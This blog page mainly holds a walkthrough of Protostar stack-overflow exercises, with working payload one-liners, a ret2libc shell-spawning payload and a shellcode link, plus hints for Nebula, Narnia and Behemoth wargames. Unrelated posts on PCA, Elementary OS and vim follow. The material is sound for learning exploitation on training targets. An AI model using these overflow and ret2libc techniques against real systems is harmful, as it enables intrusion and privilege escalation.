Wednesday, September 14, 2016

Exploit Exercises : Protostar Stack Solutions

The exercises cover the basics of stack overflows; you can read the following articles to learn the fundamentals

Before starting: the terminal given in the VM is obnoxious, so I set up SSH port forwarding in VirtualBox and connected from my local terminal (the host port 3022 is forwarded to port 22 in the VM, so the connection goes to the loopback address of the host)
VBoxManage modifyvm <myserver> --natpf1 "ssh,tcp,,3022,,22"
ssh -p 3022 <user>@127.0.0.1

Stack0

This is the introductory exercise for buffer overflows. Since the input buffer is 64 bytes, entering a string longer than 64 bytes overflows the buffer and overwrites the modified variable that sits right after it.

Stack1

In this case, in addition to overflowing the buffer, you have to write a specific value into modified. In little-endian format the least significant byte is stored at the lowest address, so the bytes of the value are written in reverse order:

./stack1 $(python -c "print 'a'*64 + '\x64\x63\x62\x61'")

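
To see why the four bytes that follow the 64 'a' land in modified, and in that order, here is an added example in C (my own code, not the Protostar source): a byte-array model of the stack0/stack1 frame, the gets()-style unbounded copy that the exercises exploit, and a bounded copy that rejects the same input. The frame layout (buffer immediately followed by modified, no padding) and all function names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 64

/* Model of the stack0/stack1 frame: a 64-byte buffer immediately followed
 * by the 4-byte `modified` variable (assumption: no padding, which is the
 * layout the exercises rely on). It is one byte array so that reading past
 * the buffer is well-defined inside this model. */
typedef struct {
    unsigned char bytes[BUF_LEN + 4];
} frame_t;

/* Read `modified` the way a little-endian CPU does: the byte at offset 64
 * is the least significant, the byte at offset 67 the most significant. */
uint32_t frame_modified(const frame_t *f) {
    const unsigned char *p = f->bytes + BUF_LEN;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* What gets() does to the frame: every input byte is stored, including the
 * ones past the buffer, so input bytes 65..68 become `modified`. The cap only
 * keeps this model in bounds; a real gets() keeps writing up the stack.
 * Returns the resulting value of `modified`. */
uint32_t unbounded_copy(frame_t *f, const unsigned char *in, size_t n) {
    memset(f->bytes, 0, sizeof f->bytes);
    if (n > sizeof f->bytes)
        n = sizeof f->bytes;
    memcpy(f->bytes, in, n);
    return frame_modified(f);
}

/* Hardened read: refuse anything that does not fit the buffer together with
 * its terminator, leaving `modified` untouched. Returns 0 on success, -1 if
 * the input was rejected. This is the check that fgets(buf, sizeof buf, stdin)
 * plus a length test gives you in place of gets(). */
int bounded_copy(frame_t *f, const unsigned char *in, size_t n) {
    if (n >= BUF_LEN)
        return -1;
    memcpy(f->bytes, in, n);
    f->bytes[n] = '\0';
    return 0;
}

/* Constructed input: the post's stack1 payload, 64 'a' followed by the
 * bytes 64 63 62 61. */
static void build_payload(unsigned char out[BUF_LEN + 4]) {
    memset(out, 'a', BUF_LEN);
    memcpy(out + BUF_LEN, "\x64\x63\x62\x61", 4);
}

/* Unbounded copy of the payload: returns what lands in `modified`
 * (0x61626364, the four trailing bytes read back to front). */
uint32_t demo_overflow(void) {
    frame_t f;
    unsigned char in[BUF_LEN + 4];
    build_payload(in);
    return unbounded_copy(&f, in, sizeof in);
}

/* Bounded copy of the same payload: rejected, and `modified` stays 0.
 * Returns 0 when both of those hold. */
int demo_bounded(void) {
    frame_t f;
    unsigned char in[BUF_LEN + 4];
    memset(f.bytes, 0, sizeof f.bytes);
    build_payload(in);
    if (bounded_copy(&f, in, sizeof in) != -1)
        return -1;
    return frame_modified(&f) == 0 ? 0 : -1;
}

int main(void) {
    printf("unbounded: modified = 0x%08x\n", demo_overflow());
    printf("bounded:   %s\n",
           demo_bounded() == 0 ? "input rejected, modified untouched" : "unexpected");
    return 0;
}
```

The same reversal explains the stack2 payload: the value the binary compares against is built from the bytes after the buffer with the first of them as the least significant byte.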
Stack2

In the bash shell you can use the export command to set the environment variable the binary reads:

export GREENIE=$(python -c "print 'a'*64 + '\x0a\x0d\x0a\x0d'")

Stack3

Here, 'fp' is a function pointer. We want to overwrite fp with the address of win().

objdump -d ./stack3

disassembles the executable; from the listing we can find the address of win().

python -c "print 'a'*64 + '\x24\x84\x04\x08'" > /tmp/stack3
./stack3 < /tmp/stack3

Stack4

From gdb you can find the address of the saved %ebp using
         info frame
and find the address of the buffer using
         p &buffer
The return address is stored right after the saved %ebp. Find the address of win() using
         p win

Now you can create the appropriate payload.

Stack5

This exercise requires us to inject shellcode using a payload. You can check that the binary is suid.
https://www.exploit-db.com/exploits/13357/

Stack6

This tutorial covers this exercise very nicely; you can read it.

https://exploit.ph/x86-32-linux/2014/08/06/ret2libc-and-rop/

I am going to try a different approach. Here we are to use the ret2libc attack with a call to system().

Now I find the address of system() in libc with gdb:

    print system = 0xb7ecffb0

This address will not get caught by the if check in the binary, so the function is allowed to return. Next I need to find how many bytes it takes to overflow up to the return address of the binary: 80 bytes gets the overflow to work. Then I need the address of the string /bin/bash in the environment variables:
0xbffff9ab:     "/bin/bash"
I got it by searching all the strings on the stack, since the environment variables must be kept somewhere there.

Now I construct my payload to be

python -c "print 'a'*80 + '\xb0\xff\xec\xb7' +'a'*4+ '\xab\xf9\xff\xbf'" > /tmp/680

To avoid the segmentation fault when system() returns, replace the four 'a' (the return address system() goes back to) with the address of libc's exit().

python -c "print 'a'*80 + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7'+ '\xab\xf9\xff\xbf'" > /tmp/680

Here, the address of the env variable is not the same when running under the binary, so after some hit and trial I got the correct address. But still the program exits without spawning the shell.


Stack7

Wednesday, August 24, 2016

Exploit-Exercises : Nebula

Here I give hints for solving the various levels of the Exploit Exercises Nebula.

Level00

non-required

Level01
symbolic links, override echo

Level02
env variables

Level03
Cron does not output to stdout.


Level04
Symbolic links


Level05
.backup, tar -xvzf <filename>, ssh key pair


Level06
/etc/passwd


Level07
webserver, url escaping, input sanitization

Level08
tcpdump,


Level09
system()


Level10
https://en.wikipedia.org/wiki/Time_of_check_to_time_of_use#Examples
nc -kl 18211
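
The check-then-use race that the linked TOCTOU article describes, next to the mitigation a defender reaches for, as an added example in C. This is my own code, not the Nebula level's source: the racy access()-then-open() pair, and a version that opens first and inspects the descriptor it actually got with fstat(). Function names and the temporary file name are assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Racy check-then-use: the file access() looked at need not be the file
 * open() gets a moment later (a symlink can be swapped in between the two
 * calls). Kept here only to contrast with the safe version below. */
int open_racy(const char *path) {
    if (access(path, R_OK) != 0)      /* check ... */
        return -1;
    return open(path, O_RDONLY);      /* ... then use: may be a different object */
}

/* Safe pattern: open once, then examine the object actually opened through
 * the descriptor. O_NOFOLLOW refuses a symlink at the final path component,
 * and the type/ownership checks run on the same inode that will be read.
 * Returns the descriptor, or -1 if anything does not match. */
int open_owned_regular(const char *path, uid_t expected_owner) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != expected_owner) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Positive path on a constructed temporary file we own: returns 0 when the
 * safe open accepts it, -1 otherwise. Tries /tmp first, then the current
 * directory, so the demo runs wherever one of them is writable. */
int demo_safe_open(void) {
    char path[] = "/tmp/toctou-demo-XXXXXX";   /* constructed name */
    int fd = mkstemp(path);
    char alt[] = "./toctou-demo-XXXXXX";       /* constructed fallback */
    const char *used = path;
    if (fd < 0) {
        fd = mkstemp(alt);
        used = alt;
    }
    if (fd < 0)
        return -1;
    close(fd);
    int got = open_owned_regular(used, getuid());
    unlink(used);
    if (got < 0)
        return -1;
    close(got);
    return 0;
}

int main(void) {
    /* /dev/null exists everywhere but is a character device, so the safe
     * open rejects it regardless of who runs this. */
    printf("/dev/null accepted: %s\n",
           open_owned_regular("/dev/null", getuid()) < 0 ? "no" : "yes");
    printf("own temp file accepted: %s\n", demo_safe_open() == 0 ? "yes" : "no");
    return 0;
}
```

In a setuid program the cleaner fix is to drop to the real uid (setresuid) before the open, so that the kernel applies the permission check and the use to the same object, which leaves no window to race.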

Level11


PS. You can find many sources for full solutions. This is just to help you when stuck while still letting you think it through yourself.

Saturday, April 30, 2016

Overthewire: Behemoth

Behemoth is the next suggested level after Narnia. While it is still binary exploitation, it does not provide the source code of the challenges, so users have to read the assembly code.

Behemoth0:
ltrace, strings

Behemoth1:
Shellcode Injections , buffer overflow



Behemoth2:
Absolute addressing


Just a comment :
Reading the main code this time we can see that canary protection has been activated. You can see this in the following disassembly (comments added):

   0x08048579 <+12>:    mov    %gs:0x14,%eax            # load the canary value from thread-local storage
   0x0804857f <+18>:    mov    %eax,0x9c(%esp)          # save a copy in the stack frame
   0x08048586 <+25>:    xor    %eax,%eax                # clear the register so the value does not linger


   0x08048620 <+179>:    mov    0x9c(%esp),%edx         # before returning, reload the saved copy
   0x08048627 <+186>:    xor    %gs:0x14,%edx           # compare it with the original canary
   0x0804862e <+193>:    je     0x8048635 <main+200>    # unchanged: continue to the epilogue and return
   0x08048630 <+195>:    call   0x80483f0 <__stack_chk_fail@plt>   # overwritten: abort via __stack_chk_fail


Sunday, April 24, 2016

OvertheWire: Narnia

I realised while solving the challenges that sometimes you just want a little hint and not a complete walkthrough, so I am listing hints for the Narnia challenges.

These challenges are based on C fundamentals and binary exploitation techniques, which in many cases are a direct implementation of those fundamentals.



Level0 :
DIY

Narnia1:
Shellcode in environment variable

Narnia2:
Buffer Overflow + Shellcode

Narnia3:
Buffer Overflow , symlinks

Narnia4:
No hints for this

Narnia5:
https://www.owasp.org/index.php/Format_string_attack
http://forum.ouah.org/FormatString.PDF

Narnia6:
Function Pointer can be overwritten
https://www.exploit-db.com/docs/28553.pdf

Narnia7:
Format String Vulnerability
ltrace

Narnia8:
 


If you want more detailed explanation or have any doubts or are stuck somewhere , welcome to comment below.


Tuesday, February 16, 2016

PCA in matlab

Here is a great introduction to PCA for beginners and I can't do better than this Princeton PCA

After reading this I was a bit confused on how to apply this in my matlab code. Let's go through it

    
    % pca() centres each column of md before computing the components,
    % so centre the same way before projecting; the result equals score(:,1:10)
    [eigenvectors,score,latent] = pca(md);
    md = bsxfun(@minus, md, mean(md)) * eigenvectors(:,1:10);
    fprintf('Eigenvalues for the data \n');
    disp(latent);

Here md contains my data; suppose it is a matrix of size 10000 x 15. Generally I should analyse the variance captured by each eigenvector (the eigenvalues returned in latent) before choosing the final dimension, but let's just say that I want 10.

eigenvectors is a 15 x 15 matrix whose columns are my eigenvectors. I project my original data onto the space spanned by the first 10 of them and get the reduced 10000 x 10 matrix in md.

Sunday, January 31, 2016

Elementary OS with ASUS zenbook

So I recently bought an Asus Zenbook UX305LA FC004T. It's in the same price range as a MacBook Air but with higher specs. Looks-wise it is a MacBook Air copy, and it comes with Windows 10 pre-installed.

But for people who need a linux distro, elementary OS is the upcoming OS that is taking the world by storm. You will definitely like its UI, and it's a good combination with the Asus Zenbook.

My review of the combination:
1. Battery life is about 8 hrs on a full charge with moderate use; it should be more on Windows.
2. The speakers are very low in volume; there are a few hacks suggested for this.
3. The screen is good and it's pretty lightweight and sturdy: my friend sat on it accidentally and all is still good.

Compared with the MacBook Air, which comes in the same price range, I don't know how this device would fare, but given the extra 128 GB of storage and the extra 4 GB of RAM this seems the better choice.


A few things that I did to install Elementary OS

After dual booting my PC with Freya, I did the following:
sudo apt-get install ubuntu-restricted-extras
Run sudo apt-get update before that, and enable the Canonical partners repository.

Following tools are a must

  • Synapse, a semantic search engine; it makes life beautiful when using linux
  • Elementary Tweaks
  • Glipper, saves the contents of your clipboard
  • KeePassX, saves the mundane passwords and the trouble of filling them in

Monday, January 25, 2016

Becoming better with vim

These are the things that I learnt while on my vim journey.

Here is a good list of articles that you should read. To start with, this is an excellent cheat sheet for vim:

An introductory cheat sheet; do this before going on to another

http://www.viemu.com/a_vi_vim_graphical_cheat_sheet_tutorial.html

Then these articles are helpful

Moolenaar : Good Vim Habits

ctags, is a very good tool for navigating through big projects.

Here is another very good blog about learning vim
http://yannesposito.com/Scratch/en/blog/Learn-Vim-Progressively/

Definitely do the above before moving on.

The next step after learning these shortcuts is having a good .vimrc file, which is basically the configuration file for your vim (stored in your HOME directory). You can search for popular .vimrc files on the net. I'll list a few that I find good.

Plugins: as suggested by a friend, I started using Vundle, which is a vim plugin manager.